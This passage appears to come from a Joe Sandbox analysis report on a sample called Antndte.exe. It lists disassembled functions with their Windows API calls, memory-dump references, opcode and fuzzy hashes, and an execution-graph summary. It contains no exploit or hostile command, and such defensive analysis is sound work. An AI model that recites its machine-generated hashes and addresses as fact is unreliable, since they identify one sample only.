                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                                                                • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                                                                                                • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                                                                • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                                                                                • wsprintfW.USER32 ref: 00404B4C
                                                                                                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                                                                • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                                                                                • Opcode Fuzzy Hash: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                                                                • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405BFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 3213498283-3404278061
                                                                                                                                • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                                                                                • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                                                                                • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                                                                • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                                                                                • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                                                                • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405289
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                                                                                  • Part of subcall function 00404263: SendMessageW.USER32(000103CC,00000000,00000000,00000000), ref: 00404275
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                                                                • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                                                                                • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                                                                • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76D63420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                                                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                                                                                • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:0%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:30.8%
                                                                                                                                Total number of Nodes:91
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 35419 3584d586 79 API calls 35546 357abf70 GetPEB LdrInitializeThunk 35421 357b5570 128 API calls 35547 357b1f70 15 API calls 35549 357da370 54 API calls 35550 357daf72 11 API calls 35423 35860593 10 API calls 35551 357a6f60 RtlDebugPrintTimes 35426 357e7550 89 API calls 35554 357ea350 102 API calls 35555 357aa740 125 API calls 35430 357ce547 101 API calls 35436 357e9d2c 94 API calls 35438 35831dd8 115 API calls 35557 357e8322 176 API calls 35441 357e8520 GetPEB GetPEB RtlDebugPrintTimes 35443 3588a1f0 8 API calls 35447 357b71f0 135 API calls 35449 35838514 7 API calls 35450 357ea5e7 87 API calls 35453 3585f51b 17 API calls 35456 357c9dd0 96 API calls 35457 357ec5c6 104 API calls 35458 357a81c0 GetPEB 35562 357ae3c0 95 API calls 35460 357b1dc0 RtlDebugPrintTimes GetPEB GetPEB 35461 357c51c0 91 API calls 35467 357a7da0 RtlDebugPrintTimes RtlDebugPrintTimes 35470 35883157 87 API calls 35474 357a8196 GetPEB GetPEB 35566 357e9790 120 API calls 35418 357f2b90 LdrInitializeThunk 35476 357acd8a 88 API calls 35478 357a918a 89 API calls 35567 3582e372 91 API calls 35569 35868770 86 API calls 35570 357b1380 47 API calls 35480 357e9580 123 API calls 35481 357b0c79 93 API calls 35482 357b8c79 6 API calls 35484 357b6074 90 API calls 35575 357ab260 102 API calls 35487 357b3c60 8 API calls 35488 3585f0a5 92 API calls 35490 357bd454 7 API calls 35492 357c0445 21 API calls 35495 3583a4c1 LdrInitializeThunk LdrInitializeThunk 35581 357cf230 GetPEB RtlDebugPrintTimes GetPEB GetPEB GetPEB 35499 357b2022 GetPEB GetPEB GetPEB 35500 357ab420 6 API calls 35583 357ab620 GetPEB RtlDebugPrintTimes GetPEB 35503 3588aceb RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 35505 357edc14 90 API calls 35587 357a9610 96 API calls 35588 358702ec 10 API calls 35507 357e2c10 93 API calls 35508 357aec0b 97 API calls 35589 3587f6f6 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 35590 358636f7 90 API calls 35511 357a640d 112 API calls 35592 357dd600 110 API calls 35513 357b64f0 RtlDebugPrintTimes GetPEB 35594 35843608 202 API calls 35514 357dacf0 10 API calls 35516 357ea4f0 89 API calls 35596 357e62f0 103 API calls 35600 357a72e0 85 API calls 35602 357b56e0 123 API calls 35603 357d66e0 134 API calls 35521 357d8cdf 86 API calls 35522 357eb0dd 87 API calls 35524 357df4d0 98 API calls 35525 357b4cd5 RtlDebugPrintTimes GetPEB GetPEB GetPEB 35527 357eccd1 103 API calls 35531 35806039 8 API calls 35532 357e9cc4 14 API calls 35533 357ab0c0 105 API calls 35605 357a82b0 87 API calls 35606 357ae2aa GetPEB GetPEB GetPEB GetPEB 35536 357f00a5 114 API calls 35537 357b00a0 187 API calls 35607 357b06a0 GetPEB GetPEB GetPEB GetPEB GetPEB 35539 35859060 20 API calls 35541 357d0c97 90 API calls 35542 357ac090 6 API calls 35609 357aa290 192 API calls 35611 357b7290 11 API calls 35543 357eb490 122 API calls 35613 357eb28a LdrInitializeThunk 35615 3586d270 52 API calls 35544 357a7c85 92 API calls

